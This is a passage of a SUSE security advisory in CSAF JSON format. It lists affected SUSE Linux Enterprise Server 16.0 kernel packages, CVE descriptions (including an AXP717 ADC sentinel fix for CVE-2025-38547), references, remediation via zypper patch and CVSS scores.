"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38543"
},
{
"cve": "CVE-2025-38547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38547"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: axp20x_adc: Add missing sentinel to AXP717 ADC channel maps\n\nThe AXP717 ADC channel maps is missing a sentinel entry at the end. This\ncauses a KASAN warning.\n\nAdd the missing sentinel entry.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38547",
"url": "https://www.suse.com/security/cve/CVE-2025-38547"
},
{
"category": "external",
"summary": "SUSE Bug 1248222 for CVE-2025-38547",
"url": "https://bugzilla.suse.com/1248222"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
